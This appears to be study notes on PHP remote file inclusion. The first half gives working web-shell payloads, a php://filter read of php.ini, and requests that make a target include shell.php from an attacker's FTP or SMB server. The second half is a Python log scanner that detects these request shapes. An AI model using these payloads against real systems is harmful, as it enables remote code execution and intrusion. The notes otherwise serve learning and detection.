# Verify RFI
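```bash
# Request URL: read php.ini base64-encoded through the php://filter wrapper
http://$IP:<PORT>/index.php?language=php://filter/read=convert.base64-encode/resource=../../../../etc/php/7.4/apache2/php.ini
# Decode the returned base64 and check the allow_url_include setting
echo '<base64>' | base64 -d | grep allow_url_include
```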
```bash
/index.php?language=http://127.0.0.1:80/index.php
```
# HTTP + PHP
```php
<?php phpinfo(); ?>
<?php system('whoami'); ?>
<?php system($_GET['cmd']); ?>
```
```bash
# Quote the heredoc delimiter so the shell does not expand $_GET
cat << 'EOF' > shell.php
<?php system($_GET['cmd']); ?>
EOF
```
# FTP
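```bash
# Start an FTP server in the current directory
sudo python -m pyftpdlib -p 21
# Request path using the ftp:// wrapper
/index.php?language=ftp://<IP>/shell.php&cmd=id
# If the server requires valid authentication
curl '.../index.php?language=ftp://user:pass@localhost/shell.php&cmd=id'
```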
# Samba SMB server > RFI
If the vulnerable web application is hosted on a Windows server, `allow_url_include` does not need to be enabled for RFI, because we can use SMB instead.
This works because Windows treats files on remote SMB servers as normal files, which can be referenced directly with a UNC path.
##### 1
```bash
impacket-smbserver -smb2support share $(pwd)
/index.php?language=\\<IP>\share\shell.php&cmd=whoami
```
##### 2
```ini
[wook]
path = /home/kali/wook
writable = no
guest ok = yes
guest only = yes
read only = yes
directory mode = 0555
force user = nobody
```
```bash
# change the directory and run the commands
cd /home/kali/wook
chmod 0555 /home/kali/wook
sudo chown -R nobody:nogroup /home/kali/wook
```
```bash
sudo service smbd restart
```
```bash
# check if our server is running
smbmap -H <my_IP>
```
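
Because the UNC route works without `allow_url_include`, auditing `php.ini` alone does not cover every request shape on this page. The following is an added example, not part of the original notes: a detection sketch that flags access-log requests whose query parameters carry a `php://`, `http://`, `ftp://` or UNC value. It checks every parameter rather than only `language`. The combined log format, the function names `classify` and `scan`, and the sample lines are assumptions.

```python
import re
from urllib.parse import parse_qsl

# Request line of a combined-format access log entry (assumed format).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Value shapes from this page: php://, http(s):// and ftp:// wrappers.
WRAPPER_RE = re.compile(r"^\s*(php|https?|ftp)://", re.I)
# \\host\share, or the forward-slash spelling Windows also accepts.
UNC_RE = re.compile(r"^\s*(?:\\\\|//)[^\\/]+[\\/]")


def classify(value):
    """Label a decoded parameter value that points at a remote resource."""
    m = WRAPPER_RE.match(value)
    if m:
        return m.group(1).lower() + " wrapper"
    if UNC_RE.match(value):
        return "UNC path"
    return None


def scan(lines):
    """Return (line_no, parameter, label) for each suspicious parameter."""
    hits = []
    for no, line in enumerate(lines, 1):
        m = REQUEST_RE.search(line)
        if not m:
            continue
        query = m.group(1).partition("?")[2]
        # parse_qsl percent-decodes, so %3A%2F%2F and %5C%5C are caught too.
        for name, value in parse_qsl(query, keep_blank_values=True):
            label = classify(value)
            if label:
                hits.append((no, name, label))
    return hits


# Constructed log lines (documentation addresses, not real traffic).
SAMPLE = [
    '198.51.100.23 - - [10/Mar/2024:10:00:01 +0000] "GET /index.php?language=es.php HTTP/1.1" 200 1523',
    '198.51.100.23 - - [10/Mar/2024:10:00:05 +0000] "GET /index.php?language=php://filter/read=convert.base64-encode/resource=../../../../etc/php/7.4/apache2/php.ini HTTP/1.1" 200 9120',
    '198.51.100.23 - - [10/Mar/2024:10:00:09 +0000] "GET /index.php?language=http%3A%2F%2F127.0.0.1%3A80%2Findex.php HTTP/1.1" 200 3046',
    '198.51.100.23 - - [10/Mar/2024:10:00:14 +0000] "GET /index.php?language=ftp://203.0.113.9/shell.php&cmd=id HTTP/1.1" 200 1580',
    '198.51.100.23 - - [10/Mar/2024:10:00:20 +0000] "GET /index.php?language=%5C%5C203.0.113.9%5Cshare%5Cshell.php&cmd=whoami HTTP/1.1" 200 1591',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE):
        print(hit)
```

The same `classify` check can back an allow-list in the application itself: reject any include parameter it labels before the value reaches `include`.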